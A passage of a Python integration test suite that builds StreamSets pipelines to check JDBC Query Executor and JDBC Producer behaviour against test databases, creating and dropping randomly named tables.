Pipeline will insert records into database and then using sqlalchemy, the verification will happen
that correct data is inserted into database.
This is achieved by using a deduplicator which assures us that there is only one ingest to database.
The pipeline looks like:
dev_raw_data_source >> record_deduplicator >> jdbc_query_executor
record_deduplicator >> trash
"""
table_name = f'stf_{get_random_string(string.ascii_lowercase, 20)}'
table = _create_table(table_name, database)
ROWS_IN_DATABASE_UPDATED = [
{'id': 1, 'name': 'Alex'},
{'id': 2, 'name': 'Alex'},
{'id': 3, 'name': 'Alex'}
]
DATA = ['id,name'] + [','.join(str(item) for item in rec.values()) for rec in ROWS_IN_DATABASE]
pipeline_builder = sdc_builder.get_pipeline_builder()
dev_raw_data_source = pipeline_builder.add_stage('Dev Raw Data Source')
dev_raw_data_source.set_attributes(data_format='DELIMITED',
header_line='WITH_HEADER',
raw_data='\n'.join(DATA))
record_deduplicator = pipeline_builder.add_stage('Record Deduplicator')
jdbc_query_executor = pipeline_builder.add_stage('JDBC Query', type='executor')
query_str1 = f"INSERT INTO {table_name} (name, id) VALUES ('${{record:value('/name')}}', '${{record:value('/id')}}')"
query_str2 = f"UPDATE {table_name} SET name = 'Alex' WHERE name = '${{record:value('/name')}}'"
jdbc_query_executor.set_attributes(sql_queries=[query_str1, query_str2])
trash = pipeline_builder.add_stage('Trash')
dev_raw_data_source >> record_deduplicator >> jdbc_query_executor
record_deduplicator >> trash
pipeline = pipeline_builder.build(title='JDBC Query Executor').configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
try:
sdc_executor.start_pipeline(pipeline).wait_for_pipeline_output_records_count(len(RAW_DATA) - 1)
sdc_executor.stop_pipeline(pipeline)
result = database.engine.execute(table.select())
data_from_database = sorted(result.fetchall(), key=lambda row: row[1]) # order by id
result.close()
assert data_from_database == [(record['name'], record['id']) for record in ROWS_IN_DATABASE_UPDATED]
finally:
logger.info(f'Dropping table {table_name} in {database.type} database ...')
table.drop(database.engine)
@database
@sdc_min_version('3.11.0')
def test_jdbc_query_executor_successful_query_event(sdc_builder, sdc_executor, database):
"""Simple JDBC Query Executor test for successful-query event type.
Pipeline will insert records into database and then using sqlalchemy, the verification will happen
that correct data is inserted into database. Event records are verified for successful-query event type.
This is achieved by using a deduplicator which assures us that there is only one ingest to database.
The pipeline looks like:
dev_raw_data_source >> record_deduplicator >> jdbc_query_executor >= trash1
record_deduplicator >> trash2
"""
table_name = get_random_string(string.ascii_lowercase, 20)
table = _create_table(table_name, database)
DATA = ['id,name'] + [','.join(str(item) for item in rec.values()) for rec in ROWS_IN_DATABASE]
pipeline_builder = sdc_builder.get_pipeline_builder()
dev_raw_data_source = pipeline_builder.add_stage('Dev Raw Data Source')
dev_raw_data_source.set_attributes(data_format='DELIMITED',
header_line='WITH_HEADER',
raw_data='\n'.join(DATA))
query_str = f"INSERT INTO {table_name} (name, id) VALUES ('${{record:value('/name')}}', '${{record:value('/id')}}')"
jdbc_query_executor = pipeline_builder.add_stage('JDBC Query', type='executor')
if Version(sdc_builder.version) < Version('3.14.0'):
jdbc_query_executor.set_attributes(sql_query=query_str)
else:
jdbc_query_executor.set_attributes(sql_queries=[query_str])
record_deduplicator = pipeline_builder.add_stage('Record Deduplicator')
trash1 = pipeline_builder.add_stage('Trash')
trash2 = pipeline_builder.add_stage('Trash')
dev_raw_data_source >> record_deduplicator >> jdbc_query_executor >= trash1
record_deduplicator >> trash2
pipeline = pipeline_builder.build(title='JDBC Query Executor').configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
try:
snapshot = sdc_executor.capture_snapshot(pipeline, start_pipeline=True).snapshot
sdc_executor.stop_pipeline(pipeline)
event_records = snapshot[jdbc_query_executor.instance_name].event_records
assert len(event_records) == 3
assert 'successful-query' == event_records[0].header['values']['sdc.event.type']
assert 'successful-query' == event_records[1].header['values']['sdc.event.type']
assert 'successful-query' == event_records[2].header['values']['sdc.event.type']
result = database.engine.execute(table.select())
data_from_database = sorted(result.fetchall(), key=lambda row: row[1]) # order by id
result.close()
assert data_from_database == [(record['name'], record['id']) for record in ROWS_IN_DATABASE]
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
table.drop(database.engine)
@database
@sdc_min_version('3.11.0')
def test_jdbc_query_executor_insert_query_result_count(sdc_builder, sdc_executor, database):
"""Simple JDBC Query Executor test for successful-query event type and query result count enabled.
Pipeline will insert records into database and then using sqlalchemy, the verification will happen
that correct data is inserted into database. Event records are verified for successful-query event type
and query-result field for the insert query.
This is achieved by using a deduplicator which assures us that there is only one ingest to database.
The pipeline looks like:
dev_raw_data_source >> record_deduplicator >> jdbc_query_executor >= trash1
record_deduplicator >> trash2
"""
table_name = get_random_string(string.ascii_lowercase, 20)
table = _create_table(table_name, database)
DATA = ['id,name'] + [','.join(str(item) for item in rec.values()) for rec in ROWS_IN_DATABASE]
pipeline_builder = sdc_builder.get_pipeline_builder()
dev_raw_data_source = pipeline_builder.add_stage('Dev Raw Data Source')
dev_raw_data_source.set_attributes(data_format='DELIMITED',
header_line='WITH_HEADER',
raw_data='\n'.join(DATA))
query_str = f"INSERT INTO {table_name} (name, id) VALUES ('${{record:value('/name')}}', '${{record:value('/id')}}')"
jdbc_query_executor = pipeline_builder.add_stage('JDBC Query', type='executor')
jdbc_query_executor.set_attributes(include_query_result_count_in_events=True)
if Version(sdc_builder.version) < Version('3.14.0'):
jdbc_query_executor.set_attributes(sql_query=query_str)
else:
jdbc_query_executor.set_attributes(sql_queries=[query_str])
record_deduplicator = pipeline_builder.add_stage('Record Deduplicator')
trash1 = pipeline_builder.add_stage('Trash')
trash2 = pipeline_builder.add_stage('Trash')
dev_raw_data_source >> record_deduplicator >> jdbc_query_executor >= trash1
record_deduplicator >> trash2
pipeline = pipeline_builder.build(title='JDBC Query Executor').configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
try:
snapshot = sdc_executor.capture_snapshot(pipeline, start_pipeline=True).snapshot
sdc_executor.stop_pipeline(pipeline)
event_records = snapshot[jdbc_query_executor.instance_name].event_records
assert len(event_records) == 3
assert 'successful-query' == event_records[0].header['values']['sdc.event.type']
assert 'successful-query' == event_records[1].header['values']['sdc.event.type']
assert 'successful-query' == event_records[2].header['values']['sdc.event.type']
assert '1 row(s) affected' == event_records[0].value['value']['query-result']['value']
assert '1 row(s) affected' == event_records[1].value['value']['query-result']['value']
assert '1 row(s) affected' == event_records[2].value['value']['query-result']['value']
result = database.engine.execute(table.select())
data_from_database = sorted(result.fetchall(), key=lambda row: row[1]) # order by id
result.close()
assert data_from_database == [(record['name'], record['id']) for record in ROWS_IN_DATABASE]
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
table.drop(database.engine)
@database
@sdc_min_version('3.0.0.0')
def test_jdbc_query_executor_lifecycle_events(sdc_builder, sdc_executor, database):
"""Verify that the JDBC Query Executor will work properly when used inside pipeline lifecycle stages."""
if isinstance(database, OracleDatabase):
pytest.skip('This test does not support Oracle')
elif type(database) == SQLServerDatabase:
pytest.skip('This test does not support SQL Server')
table_name = get_random_string(string.ascii_lowercase, 20)
metadata = sqlalchemy.MetaData()
table = sqlalchemy.Table(table_name,
metadata,
sqlalchemy.Column('user', sqlalchemy.String(50)),
sqlalchemy.Column('event', sqlalchemy.String(50)))
logger.info('Creating table %s in %s database ...', table_name, database.type)
table.create(database.engine)
query = f"INSERT INTO {table_name} VALUES ('${{record:value('/user')}}', '${{record:attribute('sdc.event.type')}}')"
builder = sdc_builder.get_pipeline_builder()
source = builder.add_stage('Dev Raw Data Source')
source.stop_after_first_batch = True
source.data_format = 'TEXT'
source.raw_data='SOMETHING'
trash = builder.add_stage('Trash')
start_stage = builder.add_start_event_stage('JDBC Query')
if Version(sdc_builder.version) < Version('3.14.0'):
start_stage.set_attributes(sql_query=query)
else:
start_stage.set_attributes(sql_queries=[query])
stop_stage = builder.add_stop_event_stage('JDBC Query')
if Version(sdc_builder.version) < Version('3.14.0'):
stop_stage.set_attributes(sql_query=query)
else:
stop_stage.set_attributes(sql_queries=[query])
source >> trash
pipeline = builder.build().configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
try:
sdc_executor.start_pipeline(pipeline).wait_for_finished()
result = database.engine.execute(table.select())
db = sorted(result.fetchall(), key=lambda row: row[1])
result.close()
assert db[0][0] == 'admin'
assert db[0][1] == 'pipeline-start'
assert db[1][0] == ''
assert db[1][1] == 'pipeline-stop'
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
table.drop(database.engine)
@database
def test_jdbc_query_executor_failure_state(sdc_builder, sdc_executor, database):
"""Verify that the executor is properly called with the proper state on pipeline initialization failure."""
table_name = get_random_string(string.ascii_lowercase, 20)
metadata = sqlalchemy.MetaData()
table = sqlalchemy.Table(table_name,
metadata,
sqlalchemy.Column('reason', sqlalchemy.String(50)))
logger.info('Creating table %s in %s database ...', table_name, database.type)
table.create(database.engine)
query = f"INSERT INTO {table_name} VALUES ('${{record:value('/reason')}}')"
builder = sdc_builder.get_pipeline_builder()
source = builder.add_stage('JDBC Multitable Consumer')
source.table_configs=[{"tablePattern": 'this_table_do_not_exists'}]
trash = builder.add_stage('Trash')
stop_stage = builder.add_stop_event_stage('JDBC Query')
if Version(sdc_builder.version) < Version('3.14.0'):
stop_stage.set_attributes(sql_query=query)
else:
stop_stage.set_attributes(sql_queries=[query])
source >> trash
pipeline = builder.build().configure_for_environment(database)
# Injecting failure - this URL won't exists, pipeline won't be able to start properly
source.jdbc_connection_string = "jdbc:mysql://this-do-not-exists:3306/awesome-db"
sdc_executor.add_pipeline(pipeline)
try:
sdc_executor.start_pipeline(pipeline, wait=False).wait_for_status('START_ERROR', ignore_errors=True)
result = database.engine.execute(table.select())
db = result.fetchall()
result.close()
assert db[0][0] == 'FAILURE'
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
table.drop(database.engine)
@database
@sdc_min_version('3.11.0')
def test_jdbc_query_executor_select_query_result_count(sdc_builder, sdc_executor, database):
"""Simple JDBC Query Executor test for successful-query event type and query result count enabled.
Pipeline will insert records into database and then using sqlalchemy, the verification will happen
that correct data is inserted into database and then the same data is queried. Event records are
verified for successful-query event type and query-result field for the select query.
This is achieved by using a deduplicator which assures us that there is only one ingest to database.
The pipeline looks like:
dev_raw_data_source >> record_deduplicator >> jdbc_query_executor1 >= jdbc_query_executor2 >= trash1
record_deduplicator >> trash2
"""
table_name = get_random_string(string.ascii_lowercase, 20)
table = _create_table(table_name, database)
DATA = ['id,name'] + [','.join(str(item) for item in rec.values()) for rec in ROWS_IN_DATABASE]
pipeline_builder = sdc_builder.get_pipeline_builder()
dev_raw_data_source = pipeline_builder.add_stage('Dev Raw Data Source')
dev_raw_data_source.set_attributes(data_format='DELIMITED',
header_line='WITH_HEADER',
raw_data='\n'.join(DATA))
query_str1 = f"INSERT INTO {table_name} (name, id) VALUES ('${{record:value('/name')}}', '${{record:value('/id')}}')"
query_str2 = f"SELECT * FROM {table_name}"
jdbc_query_executor1 = pipeline_builder.add_stage('JDBC Query', type='executor')
if Version(sdc_builder.version) < Version('3.14.0'):
jdbc_query_executor1.set_attributes(sql_query=query_str1)
else:
jdbc_query_executor1.set_attributes(sql_queries=[query_str1])
jdbc_query_executor2 = pipeline_builder.add_stage('JDBC Query', type='executor')
jdbc_query_executor2.set_attributes(include_query_result_count_in_events=True)
if Version(sdc_builder.version) < Version('3.14.0'):
jdbc_query_executor2.set_attributes(sql_query=query_str2)
else:
jdbc_query_executor2.set_attributes(sql_queries=[query_str2])
record_deduplicator = pipeline_builder.add_stage('Record Deduplicator')
trash1 = pipeline_builder.add_stage('Trash')
trash2 = pipeline_builder.add_stage('Trash')
dev_raw_data_source >> record_deduplicator >> jdbc_query_executor1 >= jdbc_query_executor2 >= trash1
record_deduplicator >> trash2
pipeline = pipeline_builder.build(title='JDBC Query Executor').configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
try:
snapshot = sdc_executor.capture_snapshot(pipeline, start_pipeline=True).snapshot
sdc_executor.stop_pipeline(pipeline)
event_records = snapshot[jdbc_query_executor2.instance_name].event_records
assert len(event_records) == 3
assert 'successful-query' == event_records[0].header['values']['sdc.event.type']
assert 'successful-query' == event_records[1].header['values']['sdc.event.type']
assert 'successful-query' == event_records[2].header['values']['sdc.event.type']
assert '3 row(s) returned' == event_records[0].value['value']['query-result']['value']
assert '3 row(s) returned' == event_records[1].value['value']['query-result']['value']
assert '3 row(s) returned' == event_records[2].value['value']['query-result']['value']
result = database.engine.execute(table.select())
result.close()
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
table.drop(database.engine)
@database
@sdc_min_version('3.11.0')
def test_jdbc_query_executor_failed_query_event(sdc_builder, sdc_executor, database):
"""Simple JDBC Query Executor test for failed-query event type.
Pipeline will try to insert records into a non-existing table and the query would fail.
Event records are verified for failed-query event type.
This is achieved by using a deduplicator which assures us that there is only one ingest to database.
The pipeline looks like:
dev_raw_data_source >> record_deduplicator >> jdbc_query_executor >= trash1
record_deduplicator >> trash2
"""
table_name = get_random_string(string.ascii_lowercase, 20)
table = _create_table(table_name, database)
DATA = ['id,name'] + [','.join(str(item) for item in rec.values()) for rec in ROWS_IN_DATABASE]
pipeline_builder = sdc_builder.get_pipeline_builder()
dev_raw_data_source = pipeline_builder.add_stage('Dev Raw Data Source')
dev_raw_data_source.set_attributes(data_format='DELIMITED',
header_line='WITH_HEADER',
raw_data='\n'.join(DATA))
invalid_table = "INVALID_TABLE"
query_str = f"INSERT INTO {invalid_table} (name, id) VALUES ('${{record:value('/name')}}', '${{record:value('/id')}}')"
jdbc_query_executor = pipeline_builder.add_stage('JDBC Query', type='executor')
if Version(sdc_builder.version) < Version('3.14.0'):
jdbc_query_executor.set_attributes(sql_query=query_str)
else:
jdbc_query_executor.set_attributes(sql_queries=[query_str])
record_deduplicator = pipeline_builder.add_stage('Record Deduplicator')
trash1 = pipeline_builder.add_stage('Trash')
trash2 = pipeline_builder.add_stage('Trash')
dev_raw_data_source >> record_deduplicator >> jdbc_query_executor >= trash1
record_deduplicator >> trash2
pipeline = pipeline_builder.build(title='JDBC Query Executor').configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
try:
snapshot = sdc_executor.capture_snapshot(pipeline, start_pipeline=True).snapshot
sdc_executor.stop_pipeline(pipeline)
event_records = snapshot[jdbc_query_executor.instance_name].event_records
assert len(event_records) == 3
assert 'failed-query' == event_records[0].header['values']['sdc.event.type']
assert 'failed-query' == event_records[1].header['values']['sdc.event.type']
assert 'failed-query' == event_records[2].header['values']['sdc.event.type']
result = database.engine.execute(table.select())
data_from_database = sorted(result.fetchall(), key=lambda row: row[1]) # order by id
result.close()
assert data_from_database == []
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
table.drop(database.engine)
@database
@sdc_min_version('3.10.0')
@pytest.mark.parametrize('enable_parallel_execution', [True, False])
def test_jdbc_query_executor_parallel_query_execution(sdc_builder, sdc_executor, database, enable_parallel_execution):
"""Test JDBC Query Executor's parallel query execution mode.
Pipeline will insert records into database, then update the records.
Using sqlalchemy, we verify that correct data was inserted (and updated) in the database.
Pipeline configuration:
dev_raw_data_source >> jdbc_query_executor
"""
table_name = get_random_string(string.ascii_uppercase, 20)
table = _create_table(table_name, database)
# Make sure that we properly escape the table name. Ideally we would do escape for all databases, but since we
# know that all except postgre are passing, we only escape for Postgre for now.
enclosed_table = f'"{table_name}"' if type(database) == PostgreSqlDatabase else table_name
# first, the inserts - they will run in parallel,
# then all the updates will run sequentially
# net result is all records should get updated to the (last) new value.
# otherwise we've failed.
statements = []
for rec in ROWS_IN_DATABASE:
statements.extend([f"INSERT INTO {enclosed_table} (name, id) VALUES ('{rec['name']}', {rec['id']})",
f"UPDATE {enclosed_table} SET name = 'bob' WHERE id = {rec['id']}",
f"UPDATE {enclosed_table} SET name = 'MERRICK' WHERE id = {rec['id']}"])
# convert to string - Dev Raw Data Source Data Format tab does not seem
# to "unroll" the array into newline-terminated records.
statements = "\n".join(statements)
pipeline_builder = sdc_builder.get_pipeline_builder()
dev_raw_data_source = pipeline_builder.add_stage('Dev Raw Data Source')
dev_raw_data_source.set_attributes(data_format='TEXT', raw_data=statements)
jdbc_query_executor = pipeline_builder.add_stage('JDBC Query', type='executor')
query_str = "${record:value('/text')}"
jdbc_query_executor.set_attributes(enable_parallel_queries=enable_parallel_execution,
maximum_pool_size=2,
minimum_idle_connections=2)
if Version(sdc_builder.version) < Version('3.14.0'):
jdbc_query_executor.set_attributes(sql_query=query_str)
else:
jdbc_query_executor.set_attributes(sql_queries=[query_str])
dev_raw_data_source >> jdbc_query_executor
pipeline = pipeline_builder.build().configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
try:
sdc_executor.start_pipeline(pipeline).wait_for_pipeline_output_records_count(len(ROWS_IN_DATABASE)*3)
sdc_executor.stop_pipeline(pipeline)
result = database.engine.execute(table.select())
data_from_database = sorted(result.fetchall(), key=lambda row: row[1]) # order by id
result.close()
assert data_from_database == [('MERRICK', record['id']) for record in ROWS_IN_DATABASE]
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
table.drop(database.engine)
def _create_jdbc_producer_pipeline(pipeline_builder, pipeline_title, raw_data, table_name, operation):
"""Helper function to create and return a pipeline with JDBC Producer
The Deduplicator assures there is only one ingest to database. The pipeline looks like:
The pipeline looks like:
dev_raw_data_source >> record_deduplicator >> jdbc_producer
record_deduplicator >> trash
"""
dev_raw_data_source = pipeline_builder.add_stage('Dev Raw Data Source')
dev_raw_data_source.set_attributes(data_format='JSON', raw_data=raw_data)
record_deduplicator = pipeline_builder.add_stage('Record Deduplicator')
FIELD_MAPPINGS = [dict(field='/id', columnName='id'),
dict(field='/name', columnName='name')]
jdbc_producer = pipeline_builder.add_stage('JDBC Producer')
jdbc_producer.set_attributes(default_operation=operation,
table_name=table_name,
field_to_column_mapping=FIELD_MAPPINGS,
stage_on_record_error='STOP_PIPELINE')
trash = pipeline_builder.add_stage('Trash')
dev_raw_data_source >> record_deduplicator >> jdbc_producer
record_deduplicator >> trash
return pipeline_builder.build(title=pipeline_title)
@database
def test_jdbc_producer_insert(sdc_builder, sdc_executor, database):
"""Simple JDBC Producer test with INSERT operation.
The pipeline inserts records into the database and verify that correct data is in the database.
"""
table_name = get_random_string(string.ascii_lowercase, 20)
table = _create_table(table_name, database)
DATA = '\n'.join(json.dumps(rec) for rec in ROWS_IN_DATABASE)
pipeline_builder = sdc_builder.get_pipeline_builder()
pipeline = _create_jdbc_producer_pipeline(pipeline_builder, 'JDBC Producer Insert', DATA, table_name, 'INSERT')
sdc_executor.add_pipeline(pipeline.configure_for_environment(database))
try:
sdc_executor.start_pipeline(pipeline).wait_for_pipeline_output_records_count(len(ROWS_IN_DATABASE))
sdc_executor.stop_pipeline(pipeline)
result = database.engine.execute(table.select())
data_from_database = sorted(result.fetchall(), key=lambda row: row[1]) # order by id
result.close()
assert data_from_database == [(record['name'], record['id']) for record in ROWS_IN_DATABASE]
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
table.drop(database.engine)
@database('mysql', 'postgresql')
def test_jdbc_producer_insert_type_err(sdc_builder, sdc_executor, database):
"""This test covers invalid type coersion - writing string into int column. As different databases works differently,
we can't assert this across all supported databases. MySQL and PostgreSQL behaves the same way and we can properly
catch and generate JDBC_23. Other databases report coercion issues much later in the query cycle, sometimes even
in a way where we can't understand what and why has happened.
"""
ROWS_IN_DATABASE = [
{'id': 1, 'name': 'Dima'},
{'id': 'X', 'name': 'Jarcec'},
{'id': 3, 'name': 'Arvind'}
]
table_name = get_random_string(string.ascii_lowercase, 20)
table = _create_table(table_name, database)
DATA = '\n'.join(json.dumps(rec) for rec in ROWS_IN_DATABASE)
pipeline_builder = sdc_builder.get_pipeline_builder()
dev_raw_data_source = pipeline_builder.add_stage('Dev Raw Data Source')
dev_raw_data_source.set_attributes(data_format='JSON', raw_data=DATA, stop_after_first_batch=True)
FIELD_MAPPINGS = [dict(field='/id', columnName='id', dataType='INTEGER'),
dict(field='/name', columnName='name', dataType='STRING')]
jdbc_producer = pipeline_builder.add_stage('JDBC Producer')
jdbc_producer.set_attributes(default_operation='INSERT',
table_name=table_name,
field_to_column_mapping=FIELD_MAPPINGS,
stage_on_record_error='TO_ERROR')
dev_raw_data_source >> jdbc_producer
pipeline = pipeline_builder.build(title="JDBC producer with error")
sdc_executor.add_pipeline(pipeline.configure_for_environment(database))
try:
snapshot = sdc_executor.capture_snapshot(pipeline, start_pipeline=True).snapshot
sdc_executor.get_pipeline_status(pipeline).wait_for_status('FINISHED')
result = database.engine.execute(table.select())
data_from_database = sorted(result.fetchall(), key=lambda row: row[1]) # order by id
result.close()
assert data_from_database == [(record['name'], record['id']) for record in ROWS_IN_DATABASE
if record['id'] != 'X']
stage = snapshot[jdbc_producer.instance_name]
assert 'JDBC_23' == stage.error_records[0].header['errorCode']
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
table.drop(database.engine)
@database
def test_jdbc_producer_insert_multiple_types(sdc_builder, sdc_executor, database):
"""Simple JDBC Producer test with INSERT operation.
The pipeline inserts 1000 records of multiple types.
The pipeline should look like:
dev_data_generator >> jdbc_producer
"""
pipeline_builder = sdc_builder.get_pipeline_builder()
dev_data_generator = pipeline_builder.add_stage('Dev Data Generator')
dev_data_generator.fields_to_generate = [
{'field': 'field1', 'type': 'STRING'},
{'field': 'field2', 'type': 'DATETIME'},
{'field': 'field3', 'type': 'INTEGER'},
{'field': 'field4', 'precision': 10, 'scale': 2, 'type': 'DECIMAL'},
{'field': 'field5', 'type': 'DOUBLE'}
]
batch_size = 10000
dev_data_generator.set_attributes(delay_between_batches=0, batch_size=batch_size)
table_name = get_random_string(string.ascii_lowercase, 20)
metadata = sqlalchemy.MetaData()
table = sqlalchemy.Table(table_name,
metadata,
sqlalchemy.Column('field1', sqlalchemy.String(50)),
sqlalchemy.Column('field2', sqlalchemy.DateTime),
sqlalchemy.Column('field3', sqlalchemy.Integer),
sqlalchemy.Column('field4', sqlalchemy.DECIMAL(10, 2)),
sqlalchemy.Column('field5', sqlalchemy.Float),
schema=None)
logger.info('Creating table %s in %s database ...', table_name, database.type)
table.create(database.engine)
FIELD_MAPPINGS = [dict(field='/field1', columnName='field1', dataType='STRING'),
dict(field='/field2', columnName='field2', dataType='DATETIME'),
dict(field='/field3', columnName='field3', dataType='INTEGER'),
dict(field='/field4', columnName='field4', dataType='DECIMAL'),
dict(field='/field5', columnName='field5', dataType='FLOAT')]
jdbc_producer = pipeline_builder.add_stage('JDBC Producer')
jdbc_producer.set_attributes(default_operation='INSERT',
table_name=table_name,
field_to_column_mapping=FIELD_MAPPINGS,
stage_on_record_error='TO_ERROR')
dev_data_generator >> jdbc_producer
pipeline = pipeline_builder.build(title="JDBC producer multiple types")
sdc_executor.add_pipeline(pipeline.configure_for_environment(database))
try:
sdc_executor.start_pipeline(pipeline).wait_for_pipeline_output_records_count(batch_size, timeout_sec=3600)
snapshot = sdc_executor.capture_snapshot(pipeline).snapshot
sdc_executor.stop_pipeline(pipeline).wait_for_stopped()
result = database.engine.execute(table.select())
data_from_database = sorted(result.fetchall(), key=lambda row: row[1]) # order by id
result.close()
assert len(data_from_database) > batch_size
stage = snapshot[jdbc_producer.instance_name]
assert len(stage.error_records) == 0
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
table.drop(database.engine)
# SDC-10786: This test intends to cover the case really precise decimals being inserted into a Float column in MSSQL
@database('sqlserver')
def test_mssql_producer_bigdecimal(sdc_builder, sdc_executor, database):
"""
Insert a Decimal value with up to 38 decimals into a Float column in MSSQL.
This will look like:
dev_data_generator >> jdbc_producer
"""
table_name = get_random_string(string.ascii_lowercase, 20)
table = sqlalchemy.Table(
table_name,
sqlalchemy.MetaData(),
sqlalchemy.Column('a_value', sqlalchemy.Float()),
sqlalchemy.Column('b_value', sqlalchemy.Float()),
sqlalchemy.Column('c_value', sqlalchemy.Float()),
sqlalchemy.Column('id', sqlalchemy.Integer, primary_key=True, autoincrement=False)
)
table.create(database.engine)
pipeline_builder = sdc_builder.get_pipeline_builder()
dev_data_generator = pipeline_builder.add_stage('Dev Data Generator')
dev_data_generator.fields_to_generate = [{'field': 'id', 'type': 'INTEGER'},
{'field': 'a_value', 'precision': 50, 'scale': 40, 'type': 'DECIMAL'},
{'field': 'b_value', 'precision': 5, 'scale': 2, 'type': 'DECIMAL'},
{'field': 'c_value', 'type': 'DECIMAL'}]
dev_data_generator.batch_size = 1
FIELD_MAPPINGS = [dict(field='/id', columnName='id'),
dict(field='/a_value', columnName='a_value'),
dict(field='/b_value', columnName='b_value'),
dict(field='/c_value', columnName='c_value')]
jdbc_producer = pipeline_builder.add_stage('JDBC Producer')
jdbc_producer.set_attributes(default_operation='INSERT',
table_name=table_name,
field_to_column_mapping=FIELD_MAPPINGS,
stage_on_record_error='STOP_PIPELINE')
dev_data_generator >> jdbc_producer
pipeline = pipeline_builder.build('MSSQL BigDecimal')
sdc_executor.add_pipeline(pipeline.configure_for_environment(database))
try:
snapshot = sdc_executor.capture_snapshot(pipeline, start_pipeline=True, wait=True).snapshot
sdc_executor.stop_pipeline(pipeline)
records = [record.field for record in snapshot[dev_data_generator.instance_name].output]
result = database.engine.execute(table.select())
data_from_database = sorted(result.fetchall(), key=lambda row: row[0]) # order by id
result.close()
assert len(data_from_database) == 1
assert math.isclose(float(str(records[0]['a_value'])), data_from_database[0][0], rel_tol=0.02)
assert math.isclose(float(str(records[0]['b_value'])), data_from_database[0][1], rel_tol=0.02)
assert math.isclose(float(str(records[0]['c_value'])), data_from_database[0][2], rel_tol=0.02)
assert math.isclose(float(str(records[0]['id'])), data_from_database[0][3], rel_tol=0.02)
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
table.drop(database.engine)
@database
def test_jdbc_producer_coerced_insert(sdc_builder, sdc_executor, database):
"""Extension of the Simple JDBC Producer test with INSERT operation.
The pipeline inserts records into the database.
In one record, data is represented as type String, where column is type Integer.
This should be passed to the database to coerce.
Verify that correct data is in the database.
Please note the use of local COERCE_ROWS_IN_DATABASE to insert
and global ROWS_IN_DATABASE to verify.
COERCE_ has id (integer) set to string.
"""
table_name = get_random_string(string.ascii_lowercase, 20)
table = _create_table(table_name, database)
COERCE_ROWS_IN_DATABASE = [
{'id': '1', 'name': 'Dima'},
{'id': '2', 'name': 'Jarcec'},
{'id': '3', 'name': 'Arvind'}
]
DATA = '\n'.join(json.dumps(rec) for rec in COERCE_ROWS_IN_DATABASE)
pipeline_builder = sdc_builder.get_pipeline_builder()
pipeline = _create_jdbc_producer_pipeline(pipeline_builder, 'JDBC Producer Insert', DATA, table_name, 'INSERT')
sdc_executor.add_pipeline(pipeline.configure_for_environment(database))
try:
sdc_executor.start_pipeline(pipeline).wait_for_pipeline_output_records_count(len(ROWS_IN_DATABASE))
sdc_executor.stop_pipeline(pipeline)
result = database.engine.execute(table.select())
data_from_database = sorted(result.fetchall(), key=lambda row: row[1]) # order by id
result.close()
assert data_from_database == [(record['name'], record['id']) for record in ROWS_IN_DATABASE]
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
table.drop(database.engine)
@database
def test_jdbc_producer_delete(sdc_builder, sdc_executor, database):
"""Simple JDBC Producer test with DELETE operation.
The pipeline deletes records from the database and verify that correct data is in the database.
Records are deleted if the primary key is matched irrespective of other column values.
"""
table_name = get_random_string(string.ascii_lowercase, 20)
table = _create_table(table_name, database)
logger.info('Adding %s rows into %s database ...', len(ROWS_IN_DATABASE), database.type)
connection = database.engine.connect()
connection.execute(table.insert(), ROWS_IN_DATABASE)
DATA = '\n'.join(json.dumps(rec) for rec in ROWS_TO_UPDATE)
pipeline_builder = sdc_builder.get_pipeline_builder()
pipeline = _create_jdbc_producer_pipeline(pipeline_builder, 'JDBC Producer Delete', DATA, table_name, 'DELETE')
sdc_executor.add_pipeline(pipeline.configure_for_environment(database))
try:
sdc_executor.start_pipeline(pipeline).wait_for_pipeline_output_records_count(len(ROWS_TO_UPDATE))
sdc_executor.stop_pipeline(pipeline)
result = database.engine.execute(table.select())
data_from_database = result.fetchall()
result.close()
removed_ids = [record['id'] for record in ROWS_TO_UPDATE]
assert data_from_database == [(record['name'], record['id']) for record in ROWS_IN_DATABASE if
record['id'] not in removed_ids]
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
table.drop(database.engine)
@database
def test_jdbc_producer_update(sdc_builder, sdc_executor, database):
"""Simple JDBC Producer test with UPDATE operation.
The pipeline updates records from the database and verify that correct data is in the database.
Records with matching primary key are updated, and no action for unmatched records.
"""
table_name = get_random_string(string.ascii_lowercase, 20)
table = _create_table(table_name, database)
logger.info('Adding %s rows into %s database ...', len(ROWS_IN_DATABASE), database.type)
connection = database.engine.connect()
connection.execute(table.insert(), ROWS_IN_DATABASE)
DATA = '\n'.join(json.dumps(rec) for rec in ROWS_TO_UPDATE)
pipeline_builder = sdc_builder.get_pipeline_builder()
pipeline = _create_jdbc_producer_pipeline(pipeline_builder, 'JDBC Producer Update', DATA, table_name, 'UPDATE')
sdc_executor.add_pipeline(pipeline.configure_for_environment(database))
try:
sdc_executor.start_pipeline(pipeline).wait_for_pipeline_output_records_count(len(ROWS_TO_UPDATE))
sdc_executor.stop_pipeline(pipeline)
result = database.engine.execute(table.select())
data_from_database = sorted(result.fetchall(), key=lambda row: row[1]) # order by id
result.close()
updated_names = {record['id']: record['name'] for record in ROWS_IN_DATABASE}
updated_names.update({record['id']: record['name'] for record in ROWS_TO_UPDATE})
assert data_from_database == [(updated_names[record['id']], record['id']) for record in ROWS_IN_DATABASE]
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
table.drop(database.engine)
# SDC-10987: JDBC Multitable Consumer multiple offset columns with initial offset
@database
